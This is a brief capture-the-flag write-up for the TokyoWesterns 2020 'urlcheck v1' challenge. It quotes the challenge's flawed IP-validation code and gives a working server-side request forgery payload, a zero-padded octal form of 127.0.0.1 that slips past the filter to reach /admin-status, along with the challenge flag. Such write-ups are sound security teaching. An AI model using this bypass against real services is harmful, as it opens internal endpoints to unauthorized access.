urlcheck v1 [98 points] (160 solves)

TokyoWesterns CTF 6th 2020 - solved together with dominikoso

Files:

Part 0: research

So, we need to make SSR to /admin-status. Cool.

Part 1: Win

It should be noted that this regex matches more than 3 digits per octet.

re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

Next, we convert each group to int.

ip = list(map(int, matches.groups()))
if any(i > 255 for i in ip) == True:
    return False

And finally check the IP (in a very dodgy way).

if ip[0] in [0, 10, 127] \
    or (ip[0] == 172 and (ip[1] > 15 or ip[1] < 32)) \
    or (ip[0] == 169 and ip[1] == 254) \
    or (ip[0] == 192 and ip[1] == 168):
    return False

It's not too had to look for common IP bypasses. Octal for worked out in this case. Final request: http://0000000000000000177.0000000000000000000000.00000000000000000000000000.1/admin-status.

Flag: TWCTF{4r3_y0u_r34dy?n3x7_57463_15_r34l_55rf!}